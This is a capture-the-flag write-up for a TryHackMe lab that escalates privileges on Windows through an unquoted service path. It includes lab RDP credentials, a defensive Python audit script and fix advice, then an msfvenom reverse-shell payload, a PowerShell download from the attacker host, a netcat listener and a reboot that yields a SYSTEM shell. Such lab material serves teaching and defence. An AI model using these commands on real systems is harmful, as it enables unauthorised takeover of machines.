THM Writeup – Quotient

Grammar is important. Don’t believe me? Just see what happens when you forget punctuation.
Add IP address to your hosts file:
echo '10.10.215.122    quotient.thm' >> /etc/hosts
Access the machine using RDP:
xfreerdp /u:sage /p:"gr33ntHEphgK2&V" /v:quotient.thm /dynamic-resolution +clipboard
Now let’s look around…
Enumeration
Get current user privileges:
C:\Users\Sage>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\Sage>
List users:
C:\Users\Sage>net user
User accounts for \\THM-QUOTIENT
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
Sage                     WDAGUtilityAccount
The command completed successfully.
C:\Users\Sage>
I looked for unusual files/folders and found this:
c:\Program Files>dir
 Volume in drive C has no label.
 Volume Serial Number is 4448-19F9
 Directory of c:\Program Files
03/07/2022  07:23 AM    <DIR>          .
03/07/2022  07:23 AM    <DIR>          ..
03/07/2022  07:27 AM    <DIR>          Amazon
09/15/2018  08:28 AM    <DIR>          Common Files
03/07/2022  05:27 AM    <DIR>          Development Files
07/19/2022  01:05 PM    <DIR>          internet explorer
07/19/2022  01:05 PM    <DIR>          Windows Defender
07/19/2022  01:05 PM    <DIR>          Windows Defender Advanced Threat Protection
07/19/2022  01:05 PM    <DIR>          Windows Mail
07/19/2022  01:05 PM    <DIR>          Windows Media Player
09/15/2018  08:19 AM    <DIR>          Windows Multimedia Platform
09/15/2018  08:28 AM    <DIR>          windows nt
07/19/2022  01:05 PM    <DIR>          Windows Photo Viewer
09/15/2018  08:19 AM    <DIR>          Windows Portable Devices
09/15/2018  08:19 AM    <DIR>          Windows Security
09/15/2018  08:19 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              16 Dir(s)  24,292,122,624 bytes free
c:\Program Files>
Development Files is an unusual folder in the Program Files folder.
Let’s take a closer look at it:
c:\Program Files>cd "Development Files"
c:\Program Files\Development Files>dir
 Volume in drive C has no label.
 Volume Serial Number is 4448-19F9
 Directory of c:\Program Files\Development Files
03/07/2022  05:27 AM    <DIR>          .
03/07/2022  05:27 AM    <DIR>          ..
03/07/2022  04:03 AM    <DIR>          Devservice Files
               0 File(s)              0 bytes
               3 Dir(s)  24,292,122,624 bytes free
c:\Program Files\Development Files>cd "Devservice Files"
c:\Program Files\Development Files\Devservice Files>dir
 Volume in drive C has no label.
 Volume Serial Number is 4448-19F9
 Directory of c:\Program Files\Development Files\Devservice Files
03/07/2022  04:03 AM    <DIR>          .
03/07/2022  04:03 AM    <DIR>          ..
03/07/2022  04:03 AM         5,966,336 Service.exe
               1 File(s)      5,966,336 bytes
               2 Dir(s)  24,292,122,624 bytes free
c:\Program Files\Development Files\Devservice Files>
We have a Service.exe executable here. What immediately came to mind is an unquoted service path…
Try to find a service that executes Service.exe:
C:\Users\Sage>wmic service get name,displayname,pathname,startmode | findstr Service.exe
Developmenet Service                                                                Development Service                       C:\Program Files\Development Files\Devservice Files\Service.exe                    Auto
Microsoft (R) Diagnostics Hub Standard Collector Service                            diagnosticshub.standardcollector.service  C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe          Manual
Windows Security Service                                                            SecurityHealthService                     C:\Windows\system32\SecurityHealthService.exe                                      Manual
Sensor Data Service                                                                 SensorDataService                         C:\Windows\System32\SensorDataService.exe                                          Disabled
Storage Tiers Management                                                            TieringEngineService                      C:\Windows\system32\TieringEngineService.exe                                       Manual
User Experience Virtualization Service                                              UevAgentService                           C:\Windows\system32\AgentService.exe                                               Disabled
C:\Users\Sage>
Great, we found a service that uses our executable.
Get details of the service:
C:\Users\Sage>sc qc "Development Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Development Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Development Files\Devservice Files\Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Developmenet Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
C:\Users\Sage>
This is definitely an unquoted service path, and its start type is AUTO_START, meaning it starts on boot. To exploit this we need write permissions on a folder in the path.
So let's check the folder permissions:
C:\Users\Sage>icacls "C:\Program Files\Development Files\ "
C:\Program Files\Development Files\  BUILTIN\Users:(W)
                                     NT SERVICE\TrustedInstaller:(I)(F)
                                     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                     NT AUTHORITY\SYSTEM:(I)(F)
                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                     BUILTIN\Administrators:(I)(F)
                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                     BUILTIN\Users:(I)(RX)
                                     BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Sage>
BUILTIN\Users:(W) – Awesome, we have write permission here: C:\Program Files\Development Files\
It looks like we have everything we need for the unquoted service path privilege escalation.
Let’s recap how unquoted service path works:
Our service executable is located at C:\Program Files\Development Files\Devservice Files\, and because the service path is unquoted, the service manager searches for its executable like this:
- C:\Program.exe
- C:\Program Files\Development.exe
- C:\Program Files\Development Files\Devservice.exe
- C:\Program Files\Development Files\Devservice Files\Service.exe
We have write permissions on C:\Program Files\Development Files\ so we need to name our new executable as Devservice.exe and place it here: C:\Program Files\Development Files\Devservice.exe. Then we need to restart the computer, since the service auto starts on boot…
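The search order recapped above, together with the two checks that led to it (an unquoted path containing spaces in the wmic listing, and a write ACE on one of the intermediate directories from icacls), can be turned into a small offline audit script. The following is an added example, not code from the original writeup; it parses constructed sample lines modelled on the wmic output shown earlier, enumerates the candidate executables in the order Windows tries them, and reports which candidates sit in a directory the audit knows to be writable. The set of writable directories is assumed to come from a separate ACL review (here it is hard-coded from the icacls result on the page).

```python
import re

# Constructed sample modelled on the writeup's `wmic service get
# name,displayname,pathname,startmode` output: wmic prints the columns
# alphabetically (DisplayName, Name, PathName, StartMode), padded with spaces.
# The last row is a constructed, correctly quoted service for contrast.
SAMPLE_WMIC = r"""DisplayName                  Name                   PathName                                                          StartMode
Developmenet Service         Development Service    C:\Program Files\Development Files\Devservice Files\Service.exe   Auto
Windows Security Service     SecurityHealthService  C:\Windows\system32\SecurityHealthService.exe                     Manual
Quoted Vendor Service        QuotedVendorSvc        "C:\Program Files\Quoted Vendor\svc.exe" -k netsvcs               Auto
"""

# Constructed: directories on which an ACL review found a write ACE for an
# unprivileged principal. On the writeup's host, icacls showed
# BUILTIN\Users:(W) on exactly this directory.
WRITABLE_DIRS = {r"C:\Program Files\Development Files"}

FIELDS = ("display_name", "name", "pathname", "startmode")


def parse_wmic(text):
    """Split wmic's space-padded table into dicts. Columns are separated by
    two or more spaces, while values (display names, paths) contain single
    spaces, so splitting on runs of 2+ spaces keeps the path intact."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("DisplayName"):
            continue
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) != len(FIELDS):
            continue  # unexpected layout: skip rather than guess
        rows.append(dict(zip(FIELDS, cols)))
    return rows


def image_path(pathname):
    """Return the unquoted executable path, or None if the path is quoted
    (a quoted path is not affected). Arguments after the first '.exe' are
    dropped so that '... svc.exe -k netsvcs' is judged on the binary alone."""
    if pathname.startswith('"'):
        return None
    idx = pathname.lower().find(".exe")
    return pathname[: idx + 4] if idx != -1 else pathname


def candidate_paths(path):
    """Executables Windows may try, in order, for an unquoted image path:
    the string is cut at each space (with '.exe' appended), and the full
    path comes last. This is the search order the writeup recaps."""
    tokens = path.split(" ")
    candidates = [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]
    candidates.append(path)
    return candidates


def _norm(directory):
    return directory.rstrip("\\").lower()


def audit(wmic_text, writable_dirs):
    """Report every service whose unquoted path contains a space, together
    with the earlier-searched candidates whose parent directory is writable
    (those are the ones an unprivileged user could plant a binary at)."""
    writable = {_norm(d) for d in writable_dirs}
    findings = []
    for row in parse_wmic(wmic_text):
        img = image_path(row["pathname"])
        if img is None or " " not in img:
            continue
        candidates = candidate_paths(img)
        exposed = [c for c in candidates[:-1]
                   if _norm(c.rpartition("\\")[0]) in writable]
        findings.append({
            "name": row["name"],
            "startmode": row["startmode"],
            "candidates": candidates,
            "exposed": exposed,
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_WMIC, WRITABLE_DIRS):
        print(f"[{f['startmode']}] {f['name']}")
        for c in f["candidates"]:
            mark = "  <-- writable parent directory" if c in f["exposed"] else ""
            print(f"    {c}{mark}")
```

Run as-is, the script flags only the Development Service and marks C:\Program Files\Development Files\Devservice.exe as the candidate whose parent directory is writable, which is exactly the path the writeup chooses. The fix on the defending side is the usual one: quote the BINARY_PATH_NAME (sc config with a quoted path) and remove the write ACE for BUILTIN\Users from the intermediate directory.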
Getting Reverse Shell
First generate a payload (our new service executable) with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.187.41 LPORT=4242 -f exe -o Devservice.exe
Run an HTTP server with Python:
python3 -m http.server
Open another terminal and start a netcat listener:
nc -lnvp 4242
On the target machine, go to the folder with write permissions and download the payload:
cd "C:\Program Files\Development Files\"
powershell Invoke-WebRequest -Uri http://10.10.187.41:8000/Devservice.exe -Outfile Devservice.exe
Now restart the target machine and wait for the service (our executable) to execute:
shutdown /r /t 0
And we have a reverse shell:
root@attackbox:~# nc -lnvp 4242
Listening on [0.0.0.0] (family 0, port 4242)
Connection from 10.10.215.122 49669 received!
Microsoft Windows [Version 10.0.17763.3165]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Now find the flag and read it:
C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 4448-19F9
 Directory of c:\Users\Administrator\Desktop
07/19/2022  01:23 PM    <DIR>          .
07/19/2022  01:23 PM    <DIR>          ..
07/19/2022  11:34 AM                17 flag.txt
               1 File(s)             17 bytes
               2 Dir(s)  24,290,566,144 bytes free
c:\Users\Administrator\Desktop>more flag.txt
more flag.txt
THM{[REDACTED]}
Do you like this writeup? Check out other THM Writeups.